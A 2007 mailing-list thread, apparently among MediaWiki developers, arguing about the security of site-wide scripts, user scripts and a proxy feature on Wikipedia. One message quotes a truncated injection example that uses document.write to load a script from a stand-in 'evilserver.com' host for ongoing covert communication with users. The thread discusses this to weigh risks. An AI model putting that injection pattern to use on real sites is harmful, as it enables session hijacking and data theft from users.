On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
By not seeing this, you guys confirm that this should not be enabled ;-)
Domas, it seems you're out of touch with the actual current behavior.
Right now anyone that can edit the site wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a a callback function with the result data.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
Only if user is including them in his profile. Other users can't include anything into user's profile.
Any sysop can. Any sysop can also edit the site wide, or throw a script into MediaWiki ns thus making it available withjs
And if you concern is "wikipedia account integrity" you're wrong to dismiss userscripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/p...